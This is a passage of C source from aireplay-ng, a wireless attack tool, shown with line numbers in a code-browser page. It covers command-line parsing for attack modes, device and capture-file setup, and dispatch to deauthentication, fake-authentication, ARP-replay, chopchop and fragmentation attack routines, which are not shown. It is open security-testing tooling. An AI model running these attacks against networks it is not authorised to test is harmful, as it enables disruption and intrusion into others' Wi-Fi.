printf( "Packet source already specified.\n" );
6044
printf("\"%s --help\" for help.\n", argv[0]);
6045
return( 1 );
6046
}
6047
opt.s_face = optarg;
6048
opt.port_in = get_ip_port(opt.s_face, opt.ip_in, sizeof(opt.ip_in)-1);
6049
break;
6050
6051
case 'r' :
6052
6053
if( opt.s_face != NULL || opt.s_file )
6054
{
6055
printf( "Packet source already specified.\n" );
6056
printf("\"%s --help\" for help.\n", argv[0]);
6057
return( 1 );
6058
}
6059
opt.s_file = optarg;
6060
break;
6061
6062
case 'z' :
6063
6064
opt.ghost = 1;
6065
6066
break;
6067
6068
case '0' :
6069
6070
if( opt.a_mode != -1 )
6071
{
6072
printf( "Attack mode already specified.\n" );
6073
printf("\"%s --help\" for help.\n", argv[0]);
6074
return( 1 );
6075
}
6076
opt.a_mode = 0;
6077
6078
for (i=0; optarg[i] != 0; i++)
6079
{
6080
if (isdigit((int)optarg[i]) == 0)
6081
break;
6082
}
6083
6084
ret = sscanf( optarg, "%d", &opt.a_count );
6085
if( opt.a_count < 0 || optarg[i] != 0 || ret != 1)
6086
{
6087
printf( "Invalid deauthentication count or missing value. [>=0]\n" );
6088
printf("\"%s --help\" for help.\n", argv[0]);
6089
return( 1 );
6090
}
6091
break;
6092
6093
case '1' :
6094
6095
if( opt.a_mode != -1 )
6096
{
6097
printf( "Attack mode already specified.\n" );
6098
printf("\"%s --help\" for help.\n", argv[0]);
6099
return( 1 );
6100
}
6101
opt.a_mode = 1;
6102
6103
for (i=0; optarg[i] != 0; i++)
6104
{
6105
if (isdigit((int)optarg[i]) == 0)
6106
break;
6107
}
6108
6109
ret = sscanf( optarg, "%d", &opt.a_delay );
6110
if( opt.a_delay < 0 || optarg[i] != 0 || ret != 1)
6111
{
6112
printf( "Invalid reauthentication delay or missing value. [>=0]\n" );
6113
printf("\"%s --help\" for help.\n", argv[0]);
6114
return( 1 );
6115
}
6116
break;
6117
6118
case '2' :
6119
6120
if( opt.a_mode != -1 )
6121
{
6122
printf( "Attack mode already specified.\n" );
6123
printf("\"%s --help\" for help.\n", argv[0]);
6124
return( 1 );
6125
}
6126
opt.a_mode = 2;
6127
break;
6128
6129
case '3' :
6130
6131
if( opt.a_mode != -1 )
6132
{
6133
printf( "Attack mode already specified.\n" );
6134
printf("\"%s --help\" for help.\n", argv[0]);
6135
return( 1 );
6136
}
6137
opt.a_mode = 3;
6138
break;
6139
6140
case '4' :
6141
6142
if( opt.a_mode != -1 )
6143
{
6144
printf( "Attack mode already specified.\n" );
6145
printf("\"%s --help\" for help.\n", argv[0]);
6146
return( 1 );
6147
}
6148
opt.a_mode = 4;
6149
break;
6150
6151
case '5' :
6152
6153
if( opt.a_mode != -1 )
6154
{
6155
printf( "Attack mode already specified.\n" );
6156
printf("\"%s --help\" for help.\n", argv[0]);
6157
return( 1 );
6158
}
6159
opt.a_mode = 5;
6160
break;
6161
6162
case '6' :
6163
6164
if( opt.a_mode != -1 )
6165
{
6166
printf( "Attack mode already specified.\n" );
6167
printf("\"%s --help\" for help.\n", argv[0]);
6168
return( 1 );
6169
}
6170
opt.a_mode = 6;
6171
break;
6172
6173
case '7' :
6174
6175
if( opt.a_mode != -1 )
6176
{
6177
printf( "Attack mode already specified.\n" );
6178
printf("\"%s --help\" for help.\n", argv[0]);
6179
return( 1 );
6180
}
6181
opt.a_mode = 7;
6182
break;
6183
6184
case '9' :
6185
6186
if( opt.a_mode != -1 )
6187
{
6188
printf( "Attack mode already specified.\n" );
6189
printf("\"%s --help\" for help.\n", argv[0]);
6190
return( 1 );
6191
}
6192
opt.a_mode = 9;
6193
break;
6194
6195
case 'F' :
6196
6197
opt.fast = 1;
6198
break;
6199
6200
case 'B' :
6201
6202
opt.bittest = 1;
6203
break;
6204
6205
case 'H' :
6206
6207
printf( usage, getVersion("Aireplay-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC) );
6208
return( 1 );
6209
6210
case 'R' :
6211
6212
opt.rtc = 0;
6213
break;
6214
6215
default : goto usage;
6216
}
6217
}
6218
6219
if( argc - optind != 1 )
6220
{
6221
if(argc == 1)
6222
{
6223
usage:
6224
printf( usage, getVersion("Aireplay-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC) );
6225
}
6226
if( argc - optind == 0)
6227
{
6228
printf("No replay interface specified.\n");
6229
}
6230
if(argc > 1)
6231
{
6232
printf("\"%s --help\" for help.\n", argv[0]);
6233
}
6234
return( 1 );
6235
}
6236
6237
if( opt.a_mode == -1 )
6238
{
6239
printf( "Please specify an attack mode.\n" );
6240
printf("\"%s --help\" for help.\n", argv[0]);
6241
return( 1 );
6242
}
6243
6244
if( (opt.f_minlen > 0 && opt.f_maxlen > 0) && opt.f_minlen > opt.f_maxlen )
6245
{
6246
printf( "Invalid length filter (min(-m):%d > max(-n):%d).\n",
6247
opt.f_minlen, opt.f_maxlen );
6248
printf("\"%s --help\" for help.\n", argv[0]);
6249
return( 1 );
6250
}
6251
6252
if ( opt.f_tods == 1 && opt.f_fromds == 1 )
6253
{
6254
printf( "FromDS and ToDS bit are set: packet has to come from the AP and go to the AP\n" );
6255
}
6256
6257
dev.fd_rtc = -1;
6258
6259
/* open the RTC device if necessary */
6260
6261
#if defined(__i386__)
6262
#if defined(linux)
6263
if( opt.a_mode > 1 )
6264
{
6265
if( ( dev.fd_rtc = open( "/dev/rtc0", O_RDONLY ) ) < 0 )
6266
{
6267
dev.fd_rtc = 0;
6268
}
6269
6270
if( (dev.fd_rtc == 0) && ( ( dev.fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 ) )
6271
{
6272
dev.fd_rtc = 0;
6273
}
6274
if(opt.rtc == 0)
6275
{
6276
dev.fd_rtc = -1;
6277
}
6278
if(dev.fd_rtc > 0)
6279
{
6280
if( ioctl( dev.fd_rtc, RTC_IRQP_SET, RTC_RESOLUTION ) < 0 )
6281
{
6282
perror( "ioctl(RTC_IRQP_SET) failed" );
6283
printf(
6284
"Make sure enhanced rtc device support is enabled in the kernel (module\n"
6285
"rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.\n" );
6286
close( dev.fd_rtc );
6287
dev.fd_rtc = -1;
6288
}
6289
else
6290
{
6291
if( ioctl( dev.fd_rtc, RTC_PIE_ON, 0 ) < 0 )
6292
{
6293
perror( "ioctl(RTC_PIE_ON) failed" );
6294
close( dev.fd_rtc );
6295
dev.fd_rtc = -1;
6296
}
6297
}
6298
}
6299
else
6300
{
6301
printf( "For information, no action required:"
6302
" Using gettimeofday() instead of /dev/rtc\n" );
6303
dev.fd_rtc = -1;
6304
}
6305
6306
}
6307
#endif /* linux */
6308
#endif /* i386 */
6309
6310
opt.iface_out = argv[optind];
6311
opt.port_out = get_ip_port(opt.iface_out, opt.ip_out, sizeof(opt.ip_out)-1);
6312
6313
//don't open interface(s) when using test mode and airserv
6314
if( ! (opt.a_mode == 9 && opt.port_out >= 0 ) )
6315
{
6316
/* open the replay interface */
6317
_wi_out = wi_open(opt.iface_out);
6318
if (!_wi_out)
6319
return 1;
6320
dev.fd_out = wi_fd(_wi_out);
6321
6322
/* open the packet source */
6323
if( opt.s_face != NULL )
6324
{
6325
//don't open interface(s) when using test mode and airserv
6326
if( ! (opt.a_mode == 9 && opt.port_in >= 0 ) )
6327
{
6328
_wi_in = wi_open(opt.s_face);
6329
if (!_wi_in)
6330
return 1;
6331
dev.fd_in = wi_fd(_wi_in);
6332
wi_get_mac(_wi_in, dev.mac_in);
6333
}
6334
}
6335
else
6336
{
6337
_wi_in = _wi_out;
6338
dev.fd_in = dev.fd_out;
6339
6340
/* XXX */
6341
dev.arptype_in = dev.arptype_out;
6342
wi_get_mac(_wi_in, dev.mac_in);
6343
}
6344
6345
wi_get_mac(_wi_out, dev.mac_out);
6346
}
6347
6348
/* drop privileges */
6349
setuid( getuid() );
6350
6351
/* XXX */
6352
if( opt.r_nbpps == 0 )
6353
{
6354
if( dev.is_wlanng || dev.is_hostap )
6355
opt.r_nbpps = 200;
6356
else
6357
opt.r_nbpps = 500;
6358
}
6359
6360
6361
if( opt.s_file != NULL )
6362
{
6363
if( ! ( dev.f_cap_in = fopen( opt.s_file, "rb" ) ) )
6364
{
6365
perror( "open failed" );
6366
return( 1 );
6367
}
6368
6369
n = sizeof( struct pcap_file_header );
6370
6371
if( fread( &dev.pfh_in, 1, n, dev.f_cap_in ) != (size_t) n )
6372
{
6373
perror( "fread(pcap file header) failed" );
6374
return( 1 );
6375
}
6376
6377
if( dev.pfh_in.magic != TCPDUMP_MAGIC &&
6378
dev.pfh_in.magic != TCPDUMP_CIGAM )
6379
{
6380
fprintf( stderr, "\"%s\" isn't a pcap file (expected "
6381
"TCPDUMP_MAGIC).\n", opt.s_file );
6382
return( 1 );
6383
}
6384
6385
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
6386
SWAP32(dev.pfh_in.linktype);
6387
6388
if( dev.pfh_in.linktype != LINKTYPE_IEEE802_11 &&
6389
dev.pfh_in.linktype != LINKTYPE_PRISM_HEADER &&
6390
dev.pfh_in.linktype != LINKTYPE_RADIOTAP_HDR &&
6391
dev.pfh_in.linktype != LINKTYPE_PPI_HDR )
6392
{
6393
fprintf( stderr, "Wrong linktype from pcap file header "
6394
"(expected LINKTYPE_IEEE802_11) -\n"
6395
"this doesn't look like a regular 802.11 "
6396
"capture.\n" );
6397
return( 1 );
6398
}
6399
}
6400
6401
//if there is no -h given, use default hardware mac
6402
if( maccmp( opt.r_smac, NULL_MAC) == 0 )
6403
{
6404
memcpy( opt.r_smac, dev.mac_out, 6);
6405
if(opt.a_mode != 0 && opt.a_mode != 4 && opt.a_mode != 9)
6406
{
6407
printf("No source MAC (-h) specified. Using the device MAC (%02X:%02X:%02X:%02X:%02X:%02X)\n",
6408
dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5]);
6409
}
6410
}
6411
6412
if( maccmp( opt.r_smac, dev.mac_out) != 0 && maccmp( opt.r_smac, NULL_MAC) != 0)
6413
{
6414
// if( dev.is_madwifi && opt.a_mode == 5 ) printf("For --fragment to work on madwifi[-ng], set the interface MAC according to (-h)!\n");
6415
fprintf( stderr, "The interface MAC (%02X:%02X:%02X:%02X:%02X:%02X)"
6416
" doesn't match the specified MAC (-h).\n"
6417
"\tifconfig %s hw ether %02X:%02X:%02X:%02X:%02X:%02X\n",
6418
dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5],
6419
opt.iface_out, opt.r_smac[0], opt.r_smac[1], opt.r_smac[2], opt.r_smac[3], opt.r_smac[4], opt.r_smac[5] );
6420
}
6421
6422
switch( opt.a_mode )
6423
{
6424
case 0 : return( do_attack_deauth() );
6425
case 1 : return( do_attack_fake_auth() );
6426
case 2 : return( do_attack_interactive() );
6427
case 3 : return( do_attack_arp_resend() );
6428
case 4 : return( do_attack_chopchop() );
6429
case 5 : return( do_attack_fragment() );
6430
case 6 : return( do_attack_caffe_latte() );
6431
case 7 : return( do_attack_cfrag() );
6432
case 9 : return( do_attack_test() );
6433
default: break;
6434
}
6435
6436
/* that's all, folks */
6437
6438
return( 0 );
6439
}
Loggerhead is a web-based interface for Breezy
Version: 2.0.1